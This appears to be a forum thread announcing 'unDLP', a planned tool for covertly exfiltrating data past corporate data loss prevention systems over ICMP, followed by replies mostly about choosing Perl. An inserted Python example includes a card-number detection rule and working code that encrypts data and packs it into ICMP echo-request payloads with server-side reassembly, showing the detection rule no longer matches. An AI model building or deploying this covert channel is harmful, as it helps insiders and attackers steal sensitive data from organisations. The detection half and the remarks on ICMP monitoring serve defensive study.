[unDLP] Presentation

Hi fellas,

As @_py suggested, I have decided to adopt a new article format to show the progress of my project, allowing you to have a better understanding of the technical choices during the development process as well as a better overview of the work accomplished.

This new series concerns a new open source project known as unDLP.

Context

As you probably already know, industrial spying costs companies millions of dollars every year through data exfiltration, data stealing, etc. In order to protect themselves against this bane, companies have invested in DLP technologies to protect sensitive information from hackers and malicious employees. A few existing solutions allow bypassing such security measures. However, none of them are flawless, discreet, or efficient enough to guarantee success. That is why unDLP was born.

DLP

Firstly, let me introduce the concept of DLP (Data Loss Protection). DLP technologies help to protect sensitive information by detecting potential data leakage at several points of failure:

  • The network
  • The end user machine (USB data transfers, emails, etc.)
  • Instant messaging software
  • Multiple services (FTP, etc.)

Once an alert is triggered, and according to its level of severity, the DLP in place warns the user and displays a preventative message (indicating that the information entered is confidential) or simply blocks the current user.

DLPs are quite similar to anti-virus software and use the same detection methods, such as regular expressions, hashes, and signatures. Indeed, during the configuration phase, the DLP software will classify any critical data, allowing it to detect suspicious activities. Moreover, they implement standard regexes in order to detect the transfer of personal information like credit card or bank account numbers.

However, despite the large coverage of these technologies, they are incapable of detecting data exfiltration through steganography and this is the flaw exploited by unDLP.

unDLP

Objective

Discreetly exfiltrate information via the ICMP protocol.

Architecture

unDLP will follow a standard client-server architecture, making it easy to retrieve the exfiltrated data.

Language

unDLP will certainly be developed in Perl. But why Perl?

First, I have never created a tool of such scale with Perl. Second, it is quite easy to convert a Perl script to a Windows executable. Finally, the most important criterion: it sounds fun! :joy:

Features

  • Data encryption
  • Public key retrieval
  • Transfer speed

Conclusion

Keep in mind that this project is still just an idea and that the development process has not started yet so any feedback or ideas are welcome.

I hope you enjoyed this reading.

Best,
Nitrax

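An added example, written for this thread and not unDLP's own code (which does not exist yet), showing both halves of the argument in the post above: the regex-plus-Luhn rule a DLP runs over outbound text, and the same data chunked, encrypted and carried in ICMP echo-request payloads, where that rule no longer sees anything. Assumptions: HMAC-SHA256 in counter mode stands in for whatever cipher unDLP ends up using, the key is pre-shared (public key retrieval is out of scope here), and the identifier 0x1234 and 32-byte chunks are arbitrary choices. The sample lines are constructed. Packets are built and parsed in memory; actually sending them needs a raw socket and root.

```python
import hashlib
import hmac
import re
import struct

# Constructed sample data (not real): line 2 carries the Luhn-valid 4111... test
# number, line 3 a 16-digit order id that fails Luhn and must not be flagged.
SAMPLE_LINES = [
    "invoice 2023-118 sent to customer",
    "card 4111 1111 1111 1111 exp 12/27",
    "order 1234567812345678 shipped",
    "meeting notes: budget review",
]
# DLP side: 13-19 digits, optionally separated by single spaces or dashes.
CARD_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")

def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check: this is what keeps order ids and dates out of the hits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def dlp_scan(text: str) -> list:
    """Card numbers a regex-plus-Luhn DLP rule flags in text (separators stripped)."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            hits.append(digits)
    return hits

# Exfil side. HMAC-SHA256 in counter mode is a stand-in stream cipher (assumption: unDLP
# has not picked one): confidentiality only, no integrity, never reuse a (key, nonce) pair.
def keystream(key: bytes, nonce: int, length: int) -> bytes:
    blocks = (length + 31) // 32
    return b"".join(hmac.new(key, struct.pack("!QQ", nonce, i), hashlib.sha256).digest()
                    for i in range(blocks))[:length]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

ICMP_ECHO_REQUEST = 8
CHUNK = 32  # secret bytes per ping; a 32-byte echo payload is an unremarkable size

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words; a valid packet sums to zero."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload

def parse_echo(packet: bytes):
    if len(packet) < 8 or icmp_checksum(packet) != 0:
        raise ValueError("truncated packet or bad ICMP checksum")
    typ, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if typ != ICMP_ECHO_REQUEST or code != 0:
        raise ValueError("not an echo request")
    return ident, seq, packet[8:]

def exfiltrate(secret: bytes, key: bytes, ident: int = 0x1234) -> list:
    """Client: chunk, encrypt (seq doubles as the nonce), wrap each chunk in an echo request."""
    packets = []
    for seq, off in enumerate(range(0, len(secret), CHUNK)):
        chunk = secret[off:off + CHUNK]
        packets.append(build_echo_request(ident, seq, xor(chunk, keystream(key, seq, len(chunk)))))
    return packets

def reassemble(packets: list, key: bytes, ident: int = 0x1234) -> bytes:
    """Server: verify checksums, keep only our ident, order by seq, decrypt."""
    chunks = {}
    for pkt in packets:
        pid, seq, ct = parse_echo(pkt)
        if pid == ident:
            chunks[seq] = xor(ct, keystream(key, seq, len(ct)))
    return b"".join(chunks[s] for s in sorted(chunks))

def wire_text(packets: list) -> str:
    # What a pattern-matching inspector sees on the wire: the raw bytes as latin-1 text.
    return "".join(p.decode("latin-1") for p in packets)

def demo() -> dict:
    key = hashlib.sha256(b"constructed demo key").digest()  # assumption: pre-shared key
    secret = "\n".join(SAMPLE_LINES).encode()
    packets = exfiltrate(secret, key)
    return {
        "plaintext_hits": dlp_scan(secret.decode()),                                     # ['4111111111111111']
        "cleartext_ping_hits": dlp_scan(wire_text([build_echo_request(1, 0, secret)])),  # same: a ping alone hides nothing
        "wire_hits": dlp_scan(wire_text(packets)),                                       # [] once encrypted
        "packets": len(packets),                                                         # 4 (128 bytes / 32)
        "roundtrip_ok": reassemble(packets, key) == secret,                              # True
    }
```

The cleartext_ping_hits entry is the point worth noticing: tunnelling over ICMP on its own is not enough, since a DLP that inspects ICMP payloads still matches the card number, and it is the encryption that removes the pattern. A network monitor that baselines ICMP rate, payload size or payload entropy would still flag this traffic, so the "Transfer speed" feature in the list above pulls directly against stealth.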

What are the benefits of Perl over C++? I think it would be easier to integrate/port into existing projects if you write it in C++, wouldn’t it?

Best,
SmartOne
P.S.: I could be wrong though, because I don’t have a lot of experience with Perl :slight_smile:


Sounds like a great idea! Can’t wait to see your implementation.


Will it be on GitLab?

you better write it in python so I can contribute


It will be, for sure, easier to maintain a C++ code base and it will clearly simplify its integration within another engine / software. However, I would like to keep unDLP independent and, frankly, I don’t care about a possible merge or integration with another structure. :smile:

Developing this project with PERL is for me an occasion to improve my skills and knowledge in PERL development :stuck_out_tongue:

Moreover, PERL provides a decent number of low level network libraries that can be useful :wink:


Nop, on my github :stuck_out_tongue:


Why not learn PERL to contribute?

I waited for such comment from you :joy:

@oaktree is right! Go outside your comfort zones!

I’m glad you took my advice into consideration! Perl is bae so I’ll definitely have a look at your code once I have some free time.


The main benefit is that Perl is the coolest scripting language ever :wink:

On top of that, it is very easy to integrate a Perl interpreter in any other project and it has a quite powerful extension system to interface to any other library out there (man perlembed and man perlxstut for details).

P.S.: It is Perl not PERL

http://perldoc.perl.org/perlfaq1.html#What's-the-difference-between-"perl"-and-"Perl"%3F


Interesting to learn about the naming difference. Had never heard of that before :joy:


Cheers mate

Always a relevant comment! I will fix that. Thanks for sharing.


I’ll keep reading when you update your series! Sounds promising
